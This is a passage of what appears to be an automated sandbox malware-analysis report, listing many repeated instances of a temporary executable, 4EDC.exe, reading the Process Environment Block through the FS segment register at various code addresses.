Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002FB0 mov eax, dword ptr fs:[00000030h] 22_2_6C002FB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003FC5 mov eax, dword ptr fs:[00000030h] 22_2_6C003FC5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003FC5 mov eax, dword ptr fs:[00000030h] 22_2_6C003FC5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003FC5 mov eax, dword ptr fs:[00000030h] 22_2_6C003FC5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D7CA mov eax, dword ptr fs:[00000030h] 22_2_6C03D7CA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D7CA mov eax, dword ptr fs:[00000030h] 22_2_6C03D7CA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0337EB mov eax, dword ptr fs:[00000030h] 22_2_6C0337EB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0437F5 mov eax, dword ptr fs:[00000030h] 22_2_6C0437F5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006800 mov eax, dword ptr fs:[00000030h] 22_2_6C006800
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006800 mov eax, dword ptr fs:[00000030h] 22_2_6C006800
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C006800 mov eax, dword ptr fs:[00000030h] 22_2_6C006800
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C018800 mov eax, dword ptr fs:[00000030h] 22_2_6C018800
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E009 mov eax, dword ptr fs:[00000030h] 22_2_6C00E009
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF019 mov eax, dword ptr fs:[00000030h] 22_2_6C0DF019
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF019 mov eax, dword ptr fs:[00000030h] 22_2_6C0DF019
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D4015 mov eax, dword ptr fs:[00000030h] 22_2_6C0D4015
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D4015 mov eax, dword ptr fs:[00000030h] 22_2_6C0D4015
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F018 mov eax, dword ptr fs:[00000030h] 22_2_6C00F018
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F018 mov eax, dword ptr fs:[00000030h] 22_2_6C00F018
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034020 mov edi, dword ptr fs:[00000030h] 22_2_6C034020
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01B02A mov eax, dword ptr fs:[00000030h] 22_2_6C01B02A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01B02A mov eax, dword ptr fs:[00000030h] 22_2_6C01B02A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01B02A mov eax, dword ptr fs:[00000030h] 22_2_6C01B02A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01B02A mov eax, dword ptr fs:[00000030h] 22_2_6C01B02A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A830 mov eax, dword ptr fs:[00000030h] 22_2_6C02A830
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A830 mov eax, dword ptr fs:[00000030h] 22_2_6C02A830
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A830 mov eax, dword ptr fs:[00000030h] 22_2_6C02A830
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A830 mov eax, dword ptr fs:[00000030h] 22_2_6C02A830
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005050 mov eax, dword ptr fs:[00000030h] 22_2_6C005050
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005050 mov eax, dword ptr fs:[00000030h] 22_2_6C005050
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005050 mov eax, dword ptr fs:[00000030h] 22_2_6C005050
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C007055 mov eax, dword ptr fs:[00000030h] 22_2_6C007055
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02F86D mov eax, dword ptr fs:[00000030h] 22_2_6C02F86D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D1074 mov eax, dword ptr fs:[00000030h] 22_2_6C0D1074
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C2073 mov eax, dword ptr fs:[00000030h] 22_2_6C0C2073
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003880 mov eax, dword ptr fs:[00000030h] 22_2_6C003880
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003880 mov eax, dword ptr fs:[00000030h] 22_2_6C003880
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0138A4 mov eax, dword ptr fs:[00000030h] 22_2_6C0138A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0138A4 mov ecx, dword ptr fs:[00000030h] 22_2_6C0138A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0490AF mov eax, dword ptr fs:[00000030h] 22_2_6C0490AF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128AE mov eax, dword ptr fs:[00000030h] 22_2_6C0128AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128AE mov eax, dword ptr fs:[00000030h] 22_2_6C0128AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128AE mov eax, dword ptr fs:[00000030h] 22_2_6C0128AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128AE mov ecx, dword ptr fs:[00000030h] 22_2_6C0128AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128AE mov eax, dword ptr fs:[00000030h] 22_2_6C0128AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128AE mov eax, dword ptr fs:[00000030h] 22_2_6C0128AE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E8B0 mov eax, dword ptr fs:[00000030h] 22_2_6C00E8B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E8B0 mov eax, dword ptr fs:[00000030h] 22_2_6C00E8B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E8B0 mov eax, dword ptr fs:[00000030h] 22_2_6C00E8B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E8B0 mov eax, dword ptr fs:[00000030h] 22_2_6C00E8B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E8B0 mov eax, dword ptr fs:[00000030h] 22_2_6C00E8B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E8B0 mov eax, dword ptr fs:[00000030h] 22_2_6C00E8B0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03F0BF mov ecx, dword ptr fs:[00000030h] 22_2_6C03F0BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03F0BF mov eax, dword ptr fs:[00000030h] 22_2_6C03F0BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03F0BF mov eax, dword ptr fs:[00000030h] 22_2_6C03F0BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0070C0 mov eax, dword ptr fs:[00000030h] 22_2_6C0070C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0070C0 mov eax, dword ptr fs:[00000030h] 22_2_6C0070C0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0040E1 mov eax, dword ptr fs:[00000030h] 22_2_6C0040E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0040E1 mov eax, dword ptr fs:[00000030h] 22_2_6C0040E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0040E1 mov eax, dword ptr fs:[00000030h] 22_2_6C0040E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BE0E9 mov eax, dword ptr fs:[00000030h] 22_2_6C0BE0E9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BE0E9 mov eax, dword ptr fs:[00000030h] 22_2_6C0BE0E9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B8E4 mov eax, dword ptr fs:[00000030h] 22_2_6C02B8E4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B8E4 mov eax, dword ptr fs:[00000030h] 22_2_6C02B8E4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0058EC mov eax, dword ptr fs:[00000030h] 22_2_6C0058EC
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128FD mov eax, dword ptr fs:[00000030h] 22_2_6C0128FD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128FD mov eax, dword ptr fs:[00000030h] 22_2_6C0128FD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0128FD mov eax, dword ptr fs:[00000030h] 22_2_6C0128FD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009100 mov eax, dword ptr fs:[00000030h] 22_2_6C009100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009100 mov eax, dword ptr fs:[00000030h] 22_2_6C009100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009100 mov eax, dword ptr fs:[00000030h] 22_2_6C009100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C010100 mov eax, dword ptr fs:[00000030h] 22_2_6C010100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C010100 mov eax, dword ptr fs:[00000030h] 22_2_6C010100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C010100 mov eax, dword ptr fs:[00000030h] 22_2_6C010100
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 mov eax, dword ptr fs:[00000030h] 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 mov eax, dword ptr fs:[00000030h] 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 mov eax, dword ptr fs:[00000030h] 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 mov eax, dword ptr fs:[00000030h] 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C024120 mov ecx, dword ptr fs:[00000030h] 22_2_6C024120
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003138 mov ecx, dword ptr fs:[00000030h] 22_2_6C003138
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03513A mov eax, dword ptr fs:[00000030h] 22_2_6C03513A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03513A mov eax, dword ptr fs:[00000030h] 22_2_6C03513A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B944 mov eax, dword ptr fs:[00000030h] 22_2_6C02B944
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02B944 mov eax, dword ptr fs:[00000030h] 22_2_6C02B944
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00395E mov eax, dword ptr fs:[00000030h] 22_2_6C00395E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00395E mov eax, dword ptr fs:[00000030h] 22_2_6C00395E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8966 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8966
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CE962 mov eax, dword ptr fs:[00000030h] 22_2_6C0CE962
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B171 mov eax, dword ptr fs:[00000030h] 22_2_6C00B171
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B171 mov eax, dword ptr fs:[00000030h] 22_2_6C00B171
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02C182 mov eax, dword ptr fs:[00000030h] 22_2_6C02C182
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CA189 mov eax, dword ptr fs:[00000030h] 22_2_6C0CA189
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0CA189 mov ecx, dword ptr fs:[00000030h] 22_2_6C0CA189
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03A185 mov eax, dword ptr fs:[00000030h] 22_2_6C03A185
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034190 mov eax, dword ptr fs:[00000030h] 22_2_6C034190
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032990 mov eax, dword ptr fs:[00000030h] 22_2_6C032990
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00519E mov eax, dword ptr fs:[00000030h] 22_2_6C00519E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00519E mov ecx, dword ptr fs:[00000030h] 22_2_6C00519E
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0361A0 mov eax, dword ptr fs:[00000030h] 22_2_6C0361A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0361A0 mov eax, dword ptr fs:[00000030h] 22_2_6C0361A0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C49A4 mov eax, dword ptr fs:[00000030h] 22_2_6C0C49A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C49A4 mov eax, dword ptr fs:[00000030h] 22_2_6C0C49A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C49A4 mov eax, dword ptr fs:[00000030h] 22_2_6C0C49A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C49A4 mov eax, dword ptr fs:[00000030h] 22_2_6C0C49A4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0851BE mov eax, dword ptr fs:[00000030h] 22_2_6C0851BE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0851BE mov eax, dword ptr fs:[00000030h] 22_2_6C0851BE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0851BE mov eax, dword ptr fs:[00000030h] 22_2_6C0851BE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0851BE mov eax, dword ptr fs:[00000030h] 22_2_6C0851BE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF1B5 mov eax, dword ptr fs:[00000030h] 22_2_6C0DF1B5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0DF1B5 mov eax, dword ptr fs:[00000030h] 22_2_6C0DF1B5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C9BF mov eax, dword ptr fs:[00000030h] 22_2_6C03C9BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03C9BF mov eax, dword ptr fs:[00000030h] 22_2_6C03C9BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov eax, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov eax, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov eax, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov ecx, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0299BF mov eax, dword ptr fs:[00000030h] 22_2_6C0299BF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0199C7 mov eax, dword ptr fs:[00000030h] 22_2_6C0199C7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0199C7 mov eax, dword ptr fs:[00000030h] 22_2_6C0199C7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0199C7 mov eax, dword ptr fs:[00000030h] 22_2_6C0199C7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0199C7 mov eax, dword ptr fs:[00000030h] 22_2_6C0199C7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0031E0 mov eax, dword ptr fs:[00000030h] 22_2_6C0031E0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0941E8 mov eax, dword ptr fs:[00000030h] 22_2_6C0941E8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B1E1 mov eax, dword ptr fs:[00000030h] 22_2_6C00B1E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B1E1 mov eax, dword ptr fs:[00000030h] 22_2_6C00B1E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00B1E1 mov eax, dword ptr fs:[00000030h] 22_2_6C00B1E1
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D89E7 mov eax, dword ptr fs:[00000030h] 22_2_6C0D89E7
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00E9ED mov eax, dword ptr fs:[00000030h] 22_2_6C00E9ED
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BD208 mov eax, dword ptr fs:[00000030h] 22_2_6C0BD208
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BD208 mov eax, dword ptr fs:[00000030h] 22_2_6C0BD208
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C018A0A mov eax, dword ptr fs:[00000030h] 22_2_6C018A0A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005210 mov eax, dword ptr fs:[00000030h] 22_2_6C005210
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005210 mov ecx, dword ptr fs:[00000030h] 22_2_6C005210
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005210 mov eax, dword ptr fs:[00000030h] 22_2_6C005210
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005210 mov eax, dword ptr fs:[00000030h] 22_2_6C005210
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C023A1C mov eax, dword ptr fs:[00000030h] 22_2_6C023A1C
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004A20 mov eax, dword ptr fs:[00000030h] 22_2_6C004A20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004A20 mov eax, dword ptr fs:[00000030h] 22_2_6C004A20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C08EA20 mov eax, dword ptr fs:[00000030h] 22_2_6C08EA20
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A229 mov eax, dword ptr fs:[00000030h] 22_2_6C02A229
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C008239 mov eax, dword ptr fs:[00000030h] 22_2_6C008239
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C008239 mov eax, dword ptr fs:[00000030h] 22_2_6C008239
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C008239 mov eax, dword ptr fs:[00000030h] 22_2_6C008239
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002240 mov ecx, dword ptr fs:[00000030h] 22_2_6C002240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C002240 mov eax, dword ptr fs:[00000030h] 22_2_6C002240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009240 mov eax, dword ptr fs:[00000030h] 22_2_6C009240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009240 mov eax, dword ptr fs:[00000030h] 22_2_6C009240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009240 mov eax, dword ptr fs:[00000030h] 22_2_6C009240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C009240 mov eax, dword ptr fs:[00000030h] 22_2_6C009240
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C094248 mov eax, dword ptr fs:[00000030h] 22_2_6C094248
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C094257 mov eax, dword ptr fs:[00000030h] 22_2_6C094257
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BB260 mov eax, dword ptr fs:[00000030h] 22_2_6C0BB260
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BB260 mov eax, dword ptr fs:[00000030h] 22_2_6C0BB260
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8A62 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8A62
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C04927A mov eax, dword ptr fs:[00000030h] 22_2_6C04927A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DA88 mov eax, dword ptr fs:[00000030h] 22_2_6C03DA88
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03DA88 mov eax, dword ptr fs:[00000030h] 22_2_6C03DA88
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D294 mov eax, dword ptr fs:[00000030h] 22_2_6C03D294
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03D294 mov eax, dword ptr fs:[00000030h] 22_2_6C03D294
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C001AA0 mov eax, dword ptr fs:[00000030h] 22_2_6C001AA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C035AA0 mov eax, dword ptr fs:[00000030h] 22_2_6C035AA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C035AA0 mov eax, dword ptr fs:[00000030h] 22_2_6C035AA0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0052A5 mov eax, dword ptr fs:[00000030h] 22_2_6C0052A5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0052A5 mov eax, dword ptr fs:[00000030h] 22_2_6C0052A5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0052A5 mov eax, dword ptr fs:[00000030h] 22_2_6C0052A5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0052A5 mov eax, dword ptr fs:[00000030h] 22_2_6C0052A5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0052A5 mov eax, dword ptr fs:[00000030h] 22_2_6C0052A5
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01AAB0 mov eax, dword ptr fs:[00000030h] 22_2_6C01AAB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C01AAB0 mov eax, dword ptr fs:[00000030h] 22_2_6C01AAB0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0312BD mov esi, dword ptr fs:[00000030h] 22_2_6C0312BD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0312BD mov eax, dword ptr fs:[00000030h] 22_2_6C0312BD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0312BD mov eax, dword ptr fs:[00000030h] 22_2_6C0312BD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005AC0 mov eax, dword ptr fs:[00000030h] 22_2_6C005AC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005AC0 mov eax, dword ptr fs:[00000030h] 22_2_6C005AC0
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C005AC0 mov eax, dword ptr fs:[00000030h] 22_2_6C005AC0
